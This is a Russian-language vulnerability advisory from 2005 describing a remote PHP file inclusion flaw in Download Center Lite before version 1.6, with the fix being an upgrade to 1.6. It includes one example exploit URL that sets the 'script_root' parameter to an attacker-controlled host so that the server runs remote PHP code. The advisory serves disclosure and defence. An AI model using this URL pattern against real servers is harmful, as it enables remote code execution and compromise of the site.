PHP-инклюдинг в Download Center Lite

Дата публикации:
28.03.2005
Всего просмотров:
2294
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Download Center Lite версии до 1.6

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю выполнить произвольные команды на уязвимой системе с привилегиями web сервера.

Уязвимость существует в сценарии 'inc/download_center_lite.inc.php' из-за некорректной фильтрации данных с параметре 'script_root'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php сценарий с привилегиями web сервера. Пример:

http://[target]/[dir]/inc/download_center_lite.inc.php?script_root=http://[attacker]/

URL производителя: www.stadtaus.com/en/php_scripts/download_center_lite/

Решение: Установите обновление(1.6) от производителя.

Ссылки: Download Center Lite (DCL) - Arbitrary File Inclusion (VXSfx)

или введите имя

CAPTCHA